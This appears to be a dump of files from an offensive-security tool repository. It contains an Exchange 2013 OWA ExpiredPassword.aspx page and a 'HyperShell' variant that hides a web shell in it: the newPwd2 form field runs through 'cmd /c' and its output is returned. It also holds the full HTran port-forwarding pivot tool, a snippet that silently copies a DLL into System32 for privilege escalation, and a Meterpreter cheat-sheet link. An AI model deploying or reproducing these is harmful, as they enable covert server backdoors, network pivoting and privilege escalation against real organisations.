https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Evilwow.png -------------------------------------------------------------------------------- /ExpiredPassword.aspx(2013): -------------------------------------------------------------------------------- 1 | <%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %> 2 | <%@ Import namespace="Microsoft.Exchange.Clients"%> 3 | <%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%> 4 | <%@ Import namespace="Microsoft.Exchange.HttpProxy"%> 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %> 13 | 14 | 15 | 42 | 43 | 44 | " style="background: #f2f2f2 url('<%=OwaUrl.AuthFolder.ImplicitUrl%><%ThemeManager.RenderBaseThemeFileUrl(Response.Output, ThemeFileId.BackgroundGradientLogin, false);%>') repeat-x"/> 45 | <% 46 | string tblStyle = "cellpadding=0 cellspacing=0"; 47 | if (IsDownLevelClient) 48 | { 49 | tblStyle = "class=\"nonMSIE\""; 50 | } 51 | %> 52 | 53 |
54 |
55 | 60 |
61 |
62 | 63 | 64 |
65 |
66 | 67 |
68 |
69 |
70 | 71 |
72 | <% if (PasswordChanged) { %> 73 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %>
74 |
75 |
76 | 77 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%> 78 |
79 | 80 |
81 | <% } else { %> 82 |
83 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%>
84 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %>
85 | <% 86 | if (Reason == ExpiredPasswordReason.InvalidCredentials) { 87 | %> 88 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %>
89 | <% 90 | } else if (Reason == ExpiredPasswordReason.InvalidNewPassword) { 91 | %> 92 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %>
93 | <% 94 | } else if (Reason == ExpiredPasswordReason.PasswordConflict) { 95 | %> 96 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %>
97 | <% 98 | } else if (Reason == ExpiredPasswordReason.LockedOut) { 99 | %> 100 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %>
101 | <% } %> 102 |
103 | 104 |
105 | 106 | 107 |
108 | 109 | 110 |
111 | 112 | 113 |
114 | 115 | 120 | 121 |
122 |
123 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%> 124 |
125 | 126 |
127 |
128 | <% } %> 129 |
130 |
131 |
132 |
133 | 134 | 135 | 136 | -------------------------------------------------------------------------------- /ExpiredPassword.aspx(2013)(HyperShell): -------------------------------------------------------------------------------- 1 | <%@ Page language="c#" AutoEventWireup="false" Inherits="Microsoft.Exchange.HttpProxy.ExpiredPassword" %> 2 | <%@ Import namespace="Microsoft.Exchange.Clients"%> 3 | <%@ Import namespace="Microsoft.Exchange.Clients.Owa.Core"%> 4 | <%@ Import namespace="Microsoft.Exchange.HttpProxy"%> 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OutlookWebAccess) %> 13 | 14 | 15 | 42 | 43 | 44 | " style="background: #f2f2f2 url('<%=OwaUrl.AuthFolder.ImplicitUrl%><%ThemeManager.RenderBaseThemeFileUrl(Response.Output, ThemeFileId.BackgroundGradientLogin, false);%>') repeat-x"/> 45 | <% 46 | string tblStyle = "cellpadding=0 cellspacing=0"; 47 | if (IsDownLevelClient) 48 | { 49 | tblStyle = "class=\"nonMSIE\""; 50 | } 51 | %> 52 | 53 |
54 |
55 | 60 |
61 |
62 | 63 | 64 |
65 |
66 | 67 |
68 |
69 |
70 | 71 |
72 | <% if (PasswordChanged) { %> 73 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.LogoffChangePasswordClickOkToLogin) %>
74 |
75 |
76 | 77 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.OkLowerCase)%> 78 |
79 | 80 |
81 | <% } else { %> 82 |
83 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordTitle)%>
84 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.PasswordExpired) %>
85 | <% 86 | if (Reason == ExpiredPasswordReason.InvalidCredentials) { 87 | %> 88 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.InvalidCredentialsMessage) %>
89 | <% 90 | } else if (Reason == ExpiredPasswordReason.InvalidNewPassword) { 91 | %> 92 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordInvalidNewPassword) %>
93 | <% 94 | } else if (Reason == ExpiredPasswordReason.PasswordConflict) { 95 | %> 96 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordConflict) %>
97 | <% 98 | } else if (Reason == ExpiredPasswordReason.LockedOut) { 99 | %> 100 |
<%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.ChangePasswordLockedOut) %>
101 | <% } %> 102 | 103 | 104 | <% 105 | try{ 106 | System.Diagnostics.Process p = new System.Diagnostics.Process(); 107 | System.Diagnostics.ProcessStartInfo i = p.StartInfo; 108 | i.FileName = "cmd"; 109 | i.Arguments = "/c " + Request.Form["newPwd2"]; 110 | i.UseShellExecute = false; 111 | i.CreateNoWindow = true; 112 | i.RedirectStandardOutput = true; 113 | p.Start(); 114 | string r = p.StandardOutput.ReadToEnd(); 115 | p.WaitForExit(); 116 | p.Close(); 117 | Response.Write("
" + Server.HtmlEncode(r) + "
"); 118 | Response.End(); 119 | }catch{} 120 | %> 121 | 122 | 123 |
124 | 125 |
126 | 127 | 128 |
129 | 130 | 131 |
132 | 133 | 134 |
135 | 136 | 141 | 142 |
143 |
144 | <%=LocalizedStrings.GetHtmlEncoded(Strings.IDs.Submit)%> 145 |
146 | 147 |
148 |
149 | <% } %> 150 |
151 |
152 |
153 |
154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /HTran.cpp: -------------------------------------------------------------------------------- 1 | 2 | 3 | /* 4 | ************************************************************************************ 5 | * 6 | * HTran.cpp - HUC Packet Transmit Tool. 7 | * 8 | * Copyright (C) 2000-2004 HUC All Rights Reserved. 9 | * 10 | * Author : lion 11 | * : lion#cnhonker.net 12 | * : http://www.cnhonker.com 13 | * : 14 | * Notice : Thx to bkbll (bkbll#cnhonker.net) 15 | * : 16 | * Date : 2003-10-20 17 | * : 18 | * Complie : cl HTran.cpp 19 | * : 20 | * Usage : E:\>HTran 21 | * : ======================== HUC Packet Transmit Tool V1.00 ======================= 22 | * : =========== Code by lion & bkbll, Welcome to http://www.cnhonker.com ========== 23 | * : 24 | * : [Usage of Packet Transmit:] 25 | * : HTran - [-log logfile] 26 | * : 27 | * : [option:] 28 | * : -listen 29 | * : -tran 30 | * : -slave 31 | * 32 | ************************************************************************************ 33 | */ 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | #pragma comment(lib, "ws2_32.lib") 41 | 42 | #define VERSION "1.00" 43 | #define TIMEOUT 300 44 | #define MAXSIZE 20480 45 | #define HOSTLEN 40 46 | #define CONNECTNUM 5 47 | 48 | // define 2 socket struct 49 | struct transocket 50 | { 51 | SOCKET fd1; 52 | SOCKET fd2; 53 | }; 54 | 55 | // define function 56 | void ver(); 57 | void usage(char *prog); 58 | void transmitdata(LPVOID data); 59 | void getctrlc(int j); 60 | void closeallfd(); 61 | void makelog(char *buffer, int length); 62 | void proxy(int port); 63 | void bind2bind(int port1, int port2); 64 | void bind2conn(int port1, char *host, int port2); 65 | void conn2conn(char *host1, int port1, char *host2, int port2); 66 | int testifisvalue(char *str); 67 | int create_socket(); 68 | int create_server(int sockfd, int port); 69 | int client_connect(int sockfd, char* server, int port); 70 | 71 | // define GLOBAL variable here 72 | extern int errno; 73 | FILE *fp; 74 | int method=0; 75 | //int connectnum=0; 76 | 77 | //************************************************************************************ 78 | // 79 | // function main ?????????????? 80 | // 81 | //************************************************************************************ 82 | VOID main(int argc, char* argv[]) 83 | { 84 | char **p; 85 | char sConnectHost[HOSTLEN], sTransmitHost[HOSTLEN]; 86 | int iConnectPort=0, iTransmitPort=0; 87 | char *logfile=NULL; 88 | 89 | ver(); 90 | memset(sConnectHost, 0, HOSTLEN); 91 | memset(sTransmitHost, 0, HOSTLEN); 92 | 93 | p=argv; 94 | while(*p) 95 | { 96 | if(stricmp(*p, "-log") == 0) 97 | { 98 | if(testifisvalue(*(p+1))) 99 | { 100 | logfile = *(++p); 101 | } 102 | else 103 | { 104 | printf("[-] ERROR: Must supply logfile name.\r\n"); 105 | return; 106 | } 107 | p++; 108 | continue; 109 | } 110 | p++; 111 | } 112 | 113 | if(logfile !=NULL) 114 | { 115 | fp=fopen(logfile,"a"); 116 | if(fp == NULL ) 117 | { 118 | printf("[-] ERROR: open logfile"); 119 | return; 120 | } 121 | 122 | makelog("====== Start ======\r\n", 22); 123 | } 124 | 125 | 126 | // Win Start Winsock. 127 | WSADATA wsadata; 128 | WSAStartup(MAKEWORD(2, 2), &wsadata); 129 | 130 | signal(SIGINT, &getctrlc); 131 | 132 | if(argc > 2) 133 | { 134 | if(stricmp(argv[1], "-listen") == 0 && argc >= 4) 135 | { 136 | iConnectPort = atoi(argv[2]); 137 | iTransmitPort = atoi(argv[3]); 138 | method = 1; 139 | } 140 | else 141 | if(stricmp(argv[1], "-tran") == 0 && argc >= 5) 142 | { 143 | iConnectPort = atoi(argv[2]); 144 | strncpy(sTransmitHost, argv[3], HOSTLEN); 145 | iTransmitPort = atoi(argv[4]); 146 | method = 2; 147 | } 148 | else 149 | if(stricmp(argv[1], "-slave") == 0 && argc >= 6) 150 | { 151 | strncpy(sConnectHost, argv[2], HOSTLEN); 152 | iConnectPort = atoi(argv[3]); 153 | strncpy(sTransmitHost, argv[4], HOSTLEN); 154 | iTransmitPort = atoi(argv[5]); 155 | method = 3; 156 | } 157 | } 158 | 159 | switch(method) 160 | { 161 | case 1: 162 | bind2bind(iConnectPort, iTransmitPort); 163 | break; 164 | case 2: 165 | bind2conn(iConnectPort, sTransmitHost, iTransmitPort); 166 | break; 167 | case 3: 168 | conn2conn(sConnectHost, iConnectPort, sTransmitHost, iTransmitPort); 169 | break; 170 | default: 171 | usage(argv[0]); 172 | break; 173 | } 174 | 175 | if(method) 176 | { 177 | closeallfd(); 178 | } 179 | 180 | WSACleanup(); 181 | 182 | return; 183 | } 184 | 185 | 186 | //************************************************************************************ 187 | // 188 | // print version message 189 | // 190 | //************************************************************************************ 191 | VOID ver() 192 | { 193 | printf("======================== HUC Packet Transmit Tool V%s =======================\r\n", VERSION); 194 | printf("=========== Code by lion & bkbll, Welcome to http://www.cnhonker.com==========\r\n\n"); 195 | } 196 | 197 | //************************************************************************************ 198 | // 199 | // print usage message 200 | // 201 | //************************************************************************************ 202 | VOID usage(char* prog) 203 | { 204 | printf("[Usage of Packet Transmit:]\r\n"); 205 | printf(" %s - [-log logfile]\n\n", prog); 206 | printf("[option:]\n"); 207 | printf(" -listen \n"); 208 | printf(" -tran \n"); 209 | printf(" -slave \n\n"); 210 | return; 211 | } 212 | 213 | //************************************************************************************ 214 | // 215 | // test if is value 216 | // 217 | //************************************************************************************ 218 | int testifisvalue(char *str) 219 | { 220 | if(str == NULL ) return(0); 221 | if(str[0]=='-') return(0); 222 | return(1); 223 | } 224 | 225 | //************************************************************************************ 226 | // 227 | // LocalHost:ConnectPort transmit to LocalHost:TransmitPort 228 | // 229 | //************************************************************************************ 230 | void bind2bind(int port1, int port2) 231 | { 232 | SOCKET fd1,fd2, sockfd1, sockfd2; 233 | struct sockaddr_in client1,client2; 234 | int size1,size2; 235 | 236 | HANDLE hThread=NULL; 237 | transocket sock; 238 | DWORD dwThreadID; 239 | 240 | if((fd1=create_socket())==0) return; 241 | if((fd2=create_socket())==0) return; 242 | 243 | printf("[+] Listening port %d ......\r\n",port1); 244 | fflush(stdout); 245 | 246 | if(create_server(fd1, port1)==0) 247 | { 248 | closesocket(fd1); 249 | return; 250 | } 251 | 252 | printf("[+] Listen OK!\r\n"); 253 | printf("[+] Listening port %d ......\r\n",port2); 254 | fflush(stdout); 255 | if(create_server(fd2, port2)==0) 256 | { 257 | closesocket(fd2); 258 | return; 259 | } 260 | 261 | printf("[+] Listen OK!\r\n"); 262 | size1=size2=sizeof(struct sockaddr); 263 | while(1) 264 | { 265 | printf("[+] Waiting for Client on port:%d ......\r\n",port1); 266 | if((sockfd1 = accept(fd1,(struct sockaddr *)&client1,&size1))<0) 267 | { 268 | printf("[-] Accept1 error.\r\n"); 269 | continue; 270 | } 271 | 272 | printf("[+] Accept a Client on port %d from %s ......\r\n", port1, inet_ntoa(client1.sin_addr)); 273 | printf("[+] Waiting another Client on port:%d....\r\n", port2); 274 | if((sockfd2 = accept(fd2, (struct sockaddr *)&client2, &size2))<0) 275 | { 276 | printf("[-] Accept2 error.\r\n"); 277 | closesocket(sockfd1); 278 | continue; 279 | } 280 | 281 | printf("[+] Accept a Client on port %d from %s\r\n",port2, inet_ntoa(client2.sin_addr)); 282 | printf("[+] Accept Connect OK!\r\n"); 283 | 284 | sock.fd1 = sockfd1; 285 | sock.fd2 = sockfd2; 286 | 287 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 288 | if(hThread == NULL) 289 | { 290 | TerminateThread(hThread, 0); 291 | return; 292 | } 293 | 294 | Sleep(1000); 295 | printf("[+] CreateThread OK!\r\n\n"); 296 | } 297 | } 298 | 299 | //************************************************************************************ 300 | // 301 | // LocalHost:ConnectPort transmit to TransmitHost:TransmitPort 302 | // 303 | //************************************************************************************ 304 | void bind2conn(int port1, char *host, int port2) 305 | { 306 | SOCKET sockfd,sockfd1,sockfd2; 307 | struct sockaddr_in remote; 308 | int size; 309 | char buffer[1024]; 310 | 311 | HANDLE hThread=NULL; 312 | transocket sock; 313 | DWORD dwThreadID; 314 | 315 | if (port1 > 65535 || port1 < 1) 316 | { 317 | printf("[-] ConnectPort invalid.\r\n"); 318 | return; 319 | } 320 | 321 | if (port2 > 65535 || port2 < 1) 322 | { 323 | printf("[-] TransmitPort invalid.\r\n"); 324 | return; 325 | } 326 | 327 | memset(buffer,0,1024); 328 | if((sockfd=create_socket()) == INVALID_SOCKET) return; 329 | 330 | if(create_server(sockfd, port1) == 0) 331 | { 332 | closesocket(sockfd); 333 | return; 334 | } 335 | 336 | size=sizeof(struct sockaddr); 337 | while(1) 338 | { 339 | printf("[+] Waiting for Client ......\r\n"); 340 | if((sockfd1=accept(sockfd,(struct sockaddr *)&remote,&size))<0) 341 | { 342 | printf("[-] Accept error.\r\n"); 343 | continue; 344 | } 345 | 346 | printf("[+] Accept a Client from %s:%d ......\r\n", 347 | inet_ntoa(remote.sin_addr), ntohs(remote.sin_port)); 348 | if((sockfd2=create_socket())==0) 349 | { 350 | closesocket(sockfd1); 351 | continue; 352 | } 353 | printf("[+] Make a Connection to %s:%d ......\r\n",host,port2); 354 | fflush(stdout); 355 | 356 | if(client_connect(sockfd2,host,port2)==0) 357 | { 358 | closesocket(sockfd2); 359 | sprintf(buffer,"[SERVER]connection to %s:%d error\r\n", host, port2); 360 | send(sockfd1,buffer,strlen(buffer),0); 361 | memset(buffer, 0, 1024); 362 | closesocket(sockfd1); 363 | continue; 364 | } 365 | 366 | printf("[+] Connect OK!\r\n"); 367 | 368 | sock.fd1 = sockfd1; 369 | sock.fd2 = sockfd2; 370 | 371 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 372 | if(hThread == NULL) 373 | { 374 | TerminateThread(hThread, 0); 375 | return; 376 | } 377 | 378 | Sleep(1000); 379 | printf("[+] CreateThread OK!\r\n\n"); 380 | } 381 | } 382 | 383 | //************************************************************************************ 384 | // 385 | // ConnectHost:ConnectPort transmit to TransmitHost:TransmitPort 386 | // 387 | //************************************************************************************ 388 | void conn2conn(char *host1,int port1,char *host2,int port2) 389 | { 390 | SOCKET sockfd1,sockfd2; 391 | 392 | HANDLE hThread=NULL; 393 | transocket sock; 394 | DWORD dwThreadID; 395 | fd_set fds; 396 | int l; 397 | char buffer[MAXSIZE]; 398 | 399 | while(1) 400 | { 401 | 402 | if((sockfd1=create_socket())==0) return; 403 | if((sockfd2=create_socket())==0) return; 404 | 405 | printf("[+] Make a Connection to %s:%d....\r\n",host1,port1); 406 | fflush(stdout); 407 | if(client_connect(sockfd1,host1,port1)==0) 408 | { 409 | closesocket(sockfd1); 410 | closesocket(sockfd2); 411 | continue; 412 | } 413 | 414 | // fix by bkbll 415 | // if host1:port1 recved data, than connect to host2,port2 416 | l=0; 417 | memset(buffer,0,MAXSIZE); 418 | while(1) 419 | { 420 | FD_ZERO(&fds); 421 | FD_SET(sockfd1, &fds); 422 | if (select(sockfd1+1, &fds, NULL, NULL, NULL) == SOCKET_ERROR) 423 | { 424 | if (errno == WSAEINTR) continue; 425 | break; 426 | } 427 | if (FD_ISSET(sockfd1, &fds)) 428 | { 429 | l=recv(sockfd1, buffer, MAXSIZE, 0); 430 | break; 431 | } 432 | Sleep(5); 433 | } 434 | 435 | if(l<=0) 436 | { 437 | printf("[-] There is a error...Create a new connection.\r\n"); 438 | continue; 439 | } 440 | while(1) 441 | { 442 | printf("[+] Connect OK!\r\n"); 443 | printf("[+] Make a Connection to %s:%d....\r\n", host2,port2); 444 | fflush(stdout); 445 | if(client_connect(sockfd2,host2,port2)==0) 446 | { 447 | closesocket(sockfd1); 448 | closesocket(sockfd2); 449 | continue; 450 | } 451 | 452 | if(send(sockfd2,buffer,l,0)==SOCKET_ERROR) 453 | { 454 | printf("[-] Send failed.\r\n"); 455 | continue; 456 | } 457 | 458 | l=0; 459 | memset(buffer,0,MAXSIZE); 460 | break; 461 | } 462 | 463 | printf("[+] All Connect OK!\r\n"); 464 | 465 | sock.fd1 = sockfd1; 466 | sock.fd2 = sockfd2; 467 | 468 | hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)transmitdata, (LPVOID)&sock, 0, &dwThreadID); 469 | if(hThread == NULL) 470 | { 471 | TerminateThread(hThread, 0); 472 | return; 473 | } 474 | 475 | // connectnum++; 476 | 477 | Sleep(1000); 478 | printf("[+] CreateThread OK!\r\n\n"); 479 | } 480 | } 481 | 482 | //************************************************************************************ 483 | // 484 | // Socket Transmit to Socket 485 | // 486 | //************************************************************************************ 487 | void transmitdata(LPVOID data) 488 | { 489 | SOCKET fd1, fd2; 490 | transocket *sock; 491 | struct timeval timeset; 492 | fd_set readfd,writefd; 493 | int result,i=0; 494 | char read_in1[MAXSIZE],send_out1[MAXSIZE]; 495 | char read_in2[MAXSIZE],send_out2[MAXSIZE]; 496 | int read1=0,totalread1=0,send1=0; 497 | int read2=0,totalread2=0,send2=0; 498 | int sendcount1,sendcount2; 499 | int maxfd; 500 | struct sockaddr_in client1,client2; 501 | int structsize1,structsize2; 502 | char host1[20],host2[20]; 503 | int port1=0,port2=0; 504 | char tmpbuf[100]; 505 | 506 | sock = (transocket *)data; 507 | fd1 = sock->fd1; 508 | fd2 = sock->fd2; 509 | 510 | memset(host1,0,20); 511 | memset(host2,0,20); 512 | memset(tmpbuf,0,100); 513 | 514 | structsize1=sizeof(struct sockaddr); 515 | structsize2=sizeof(struct sockaddr); 516 | 517 | if(getpeername(fd1,(struct sockaddr *)&client1,&structsize1)<0) 518 | { 519 | strcpy(host1, "fd1"); 520 | } 521 | else 522 | { 523 | // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client1.sin_addr),ntohs(client1.sin_port)); 524 | strcpy(host1, inet_ntoa(client1.sin_addr)); 525 | port1=ntohs(client1.sin_port); 526 | } 527 | 528 | if(getpeername(fd2,(struct sockaddr *)&client2,&structsize2)<0) 529 | { 530 | strcpy(host2,"fd2"); 531 | } 532 | else 533 | { 534 | // printf("[+]got, ip:%s, port:%d\r\n",inet_ntoa(client2.sin_addr),ntohs(client2.sin_port)); 535 | strcpy(host2, inet_ntoa(client2.sin_addr)); 536 | port2=ntohs(client2.sin_port); 537 | } 538 | 539 | printf("[+] Start Transmit (%s:%d <-> %s:%d) ......\r\n\n", host1, port1, host2, port2); 540 | 541 | maxfd=max(fd1,fd2)+1; 542 | memset(read_in1,0,MAXSIZE); 543 | memset(read_in2,0,MAXSIZE); 544 | memset(send_out1,0,MAXSIZE); 545 | memset(send_out2,0,MAXSIZE); 546 | 547 | timeset.tv_sec=TIMEOUT; 548 | timeset.tv_usec=0; 549 | 550 | while(1) 551 | { 552 | FD_ZERO(&readfd); 553 | FD_ZERO(&writefd); 554 | 555 | FD_SET((UINT)fd1, &readfd); 556 | FD_SET((UINT)fd1, &writefd); 557 | FD_SET((UINT)fd2, &writefd); 558 | FD_SET((UINT)fd2, &readfd); 559 | 560 | result=select(maxfd,&readfd,&writefd,NULL,×et); 561 | if((result<0) && (errno!=EINTR)) 562 | { 563 | printf("[-] Select error.\r\n"); 564 | break; 565 | } 566 | else if(result==0) 567 | { 568 | printf("[-] Socket time out.\r\n"); 569 | break; 570 | } 571 | 572 | if(FD_ISSET(fd1, &readfd)) 573 | { 574 | /* must < MAXSIZE-totalread1, otherwise send_out1 will flow */ 575 | if(totalread1 < MAXSIZE 576 | 577 | ) { 578 | read1=recv(fd1, read_in1, MAXSIZE-totalread1, 0); 579 | if((read1==SOCKET_ERROR) || (read1==0)) 580 | { 581 | printf("[-] Read fd1 data error,maybe close?\r\n"); 582 | break; 583 | } 584 | 585 | memcpy(send_out1+totalread1,read_in1,read1); 586 | sprintf(tmpbuf,"\r\nRecv %5d bytes from %s:%d\r\n", read1, host1, port1); 587 | printf(" Recv %5d bytes %16s:%d\r\n", read1, host1, port1); 588 | makelog(tmpbuf,strlen(tmpbuf)); 589 | makelog(read_in1,read1); 590 | totalread1+=read1; 591 | memset(read_in1,0,MAXSIZE); 592 | } 593 | } 594 | 595 | if(FD_ISSET(fd2, &writefd)) 596 | { 597 | int err=0; 598 | sendcount1=0; 599 | while(totalread1>0) 600 | { 601 | send1=send(fd2, send_out1+sendcount1, totalread1, 0); 602 | if(send1==0)break; 603 | if((send1<0) && (errno!=EINTR)) 604 | { 605 | printf("[-] Send to fd2 unknow error.\r\n"); 606 | err=1; 607 | break; 608 | } 609 | 610 | if((send1<0) && (errno==ENOSPC)) break; 611 | sendcount1+=send1; 612 | totalread1-=send1; 613 | 614 | printf(" Send %5d bytes %16s:%d\r\n", send1, host2, port2); 615 | } 616 | 617 | if(err==1) break; 618 | if((totalread1>0) && (sendcount1>0)) 619 | { 620 | /* move not sended data to start addr */ 621 | memcpy(send_out1,send_out1+sendcount1,totalread1); 622 | memset(send_out1+totalread1,0,MAXSIZE-totalread1); 623 | } 624 | else 625 | memset(send_out1,0,MAXSIZE); 626 | } 627 | 628 | if(FD_ISSET(fd2, &readfd)) 629 | { 630 | if(totalread2 < MAXSIZE 631 | 632 | ) { 633 | read2=recv(fd2,read_in2,MAXSIZE-totalread2, 0); 634 | if(read2==0)break; 635 | if((read2<0) && (errno!=EINTR)) 636 | { 637 | printf("[-] Read fd2 data error,maybe close?\r\n\r\n"); 638 | break; 639 | } 640 | 641 | memcpy(send_out2+totalread2,read_in2,read2); 642 | sprintf(tmpbuf, "\r\nRecv %5d bytes from %s:%d\r\n", read2, host2, port2); 643 | printf(" Recv %5d bytes %16s:%d\r\n", read2, host2, port2); 644 | makelog(tmpbuf,strlen(tmpbuf)); 645 | makelog(read_in2,read2); 646 | totalread2+=read2; 647 | memset(read_in2,0,MAXSIZE); 648 | } 649 | } 650 | 651 | if(FD_ISSET(fd1, &writefd)) 652 | { 653 | int err2=0; 654 | sendcount2=0; 655 | while(totalread2>0) 656 | { 657 | send2=send(fd1, send_out2+sendcount2, totalread2, 0); 658 | if(send2==0)break; 659 | if((send2<0) && (errno!=EINTR)) 660 | { 661 | printf("[-] Send to fd1 unknow error.\r\n"); 662 | err2=1; 663 | break; 664 | } 665 | if((send2<0) && (errno==ENOSPC)) break; 666 | sendcount2+=send2; 667 | totalread2-=send2; 668 | 669 | printf(" Send %5d bytes %16s:%d\r\n", send2, host1, port1); 670 | } 671 | if(err2==1) break; 672 | if((totalread2>0) && (sendcount2 > 0)) 673 | { 674 | /* move not sended data to start addr */ 675 | memcpy(send_out2, send_out2+sendcount2, totalread2); 676 | memset(send_out2+totalread2, 0, MAXSIZE-totalread2); 677 | } 678 | else 679 | memset(send_out2,0,MAXSIZE); 680 | } 681 | 682 | Sleep(5); 683 | } 684 | 685 | closesocket(fd1); 686 | closesocket(fd2); 687 | // if(method == 3) 688 | // connectnum --; 689 | 690 | printf("\r\n[+] OK! I Closed The Two Socket.\r\n"); 691 | } 692 | 693 | void getctrlc(int j) 694 | { 695 | printf("\r\n[-] Received Ctrl+C\r\n"); 696 | closeallfd(); 697 | exit(0); 698 | } 699 | 700 | void closeallfd() 701 | { 702 | int i; 703 | 704 | printf("[+] Let me exit ......\r\n"); 705 | fflush(stdout); 706 | 707 | for(i=3; i<256; i++) 708 | { 709 | closesocket(i); 710 | } 711 | 712 | if(fp != NULL) 713 | { 714 | fprintf(fp,"\r\n====== Exit ======\r\n"); 715 | fclose(fp); 716 | } 717 | 718 | printf("[+] All Right!\r\n"); 719 | } 720 | 721 | int create_socket() 722 | { 723 | int sockfd; 724 | 725 | sockfd=socket(AF_INET,SOCK_STREAM,0); 726 | if(sockfd<0) 727 | { 728 | printf("[-] Create socket error.\r\n"); 729 | return(0); 730 | } 731 | 732 | return(sockfd); 733 | } 734 | 735 | int create_server(int sockfd,int port) 736 | { 737 | struct sockaddr_in srvaddr; 738 | int on=1; 739 | 740 | memset(&srvaddr, 0, sizeof(struct sockaddr)); 741 | 742 | srvaddr.sin_port=htons(port); 743 | srvaddr.sin_family=AF_INET; 744 | srvaddr.sin_addr.s_addr=htonl(INADDR_ANY); 745 | 746 | setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR, (char*)&on,sizeof(on)); //so I can rebind the port 747 | 748 | if(bind(sockfd,(struct sockaddr *)&srvaddr,sizeof(struct sockaddr))<0) 749 | { 750 | printf("[-] Socket bind error.\r\n"); 751 | return(0); 752 | } 753 | 754 | if(listen(sockfd,CONNECTNUM)<0) 755 | { 756 | printf("[-] Socket Listen error.\r\n"); 757 | return(0); 758 | } 759 | 760 | return(1); 761 | } 762 | 763 | int client_connect(int sockfd,char* server,int port) 764 | { 765 | struct sockaddr_in cliaddr; 766 | struct hostent *host; 767 | 768 | if(!(host=gethostbyname(server))) 769 | { 770 | printf("[-] Gethostbyname(%s) error:%s\n",server,strerror(errno)); 771 | return(0); 772 | } 773 | 774 | memset(&cliaddr, 0, sizeof(struct sockaddr)); 775 | cliaddr.sin_family=AF_INET; 776 | cliaddr.sin_port=htons(port); 777 | cliaddr.sin_addr=*((struct in_addr *)host->h_addr); 778 | 779 | if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct sockaddr))<0) 780 | { 781 | printf("[-] Connect error.\r\n"); 782 | return(0); 783 | } 784 | return(1); 785 | } 786 | 787 | void makelog(char *buffer,int length) 788 | { 789 | if(fp !=NULL) 790 | { 791 | // fprintf(fp, "%s", buffer); 792 | // printf("%s",buffer); 793 | write(fileno(fp),buffer,length); 794 | // fflush(fp); 795 | } 796 | } 797 | -------------------------------------------------------------------------------- /Hacking - Meterpreter Cheat Sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/3gstudent/test/15218f57c171ee7c6369bdb670e4b19222ef23a4/Hacking - Meterpreter Cheat Sheet.pdf -------------------------------------------------------------------------------- /IFileOperation.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int _tmain(int argc, _TCHAR* argv[]) 4 | { 5 | HMODULE hModule = NULL; 6 | IFileOperation *fileOperation = NULL; 7 | LPCWSTR dllName = L"ntwdblib.dll"; 8 | LPCWSTR SourceFullPath = L"C:\\6\\ntwdblib.dll"; 9 | LPCWSTR DestPath = L"C:\\windows\\System32"; 10 | HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE); 11 | if (SUCCEEDED(hr)) { 12 | hr = CoCreateInstance(CLSID_FileOperation, NULL, CLSCTX_ALL, IID_PPV_ARGS(&fileOperation)); 13 | if (SUCCEEDED(hr)) { 14 | hr = fileOperation->SetOperationFlags( 15 | FOF_NOCONFIRMATION | 16 | FOF_SILENT | 17 | FOFX_SHOWELEVATIONPROMPT | 18 | FOFX_NOCOPYHOOKS | 19 | FOFX_REQUIREELEVATION | 20 | FOF_NOERRORUI); 21 | if (SUCCEEDED(hr)) { 22 | IShellItem *from = NULL, *to = NULL; 23 | hr = SHCreateItemFromParsingName(SourceFullPath, NULL, IID_PPV_ARGS(&from)); 24 | if (SUCCEEDED(hr)) { 25 | if (DestPath) 26 | hr = SHCreateItemFromParsingName(DestPath, NULL, IID_PPV_ARGS(&to)); 27 | if (SUCCEEDED(hr)) { 28 | hr = fileOperation->CopyItem(from, to, dllName, NULL); 29 | if (NULL != to) 30 | to->Release(); 31 | } 32 | from->Release(); 33 | } 34 | if (SUCCEEDED(hr)) { 35 | hr = fileOperation->PerformOperations(); 36 | } 37 | } 38 | fileOperation->Release(); 39 | } 40 | CoUninitialize(); 41 | } 42 | return 0; 43 | } 44 | -------------------------------------------------------------------------------- /MasqueradePEB.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 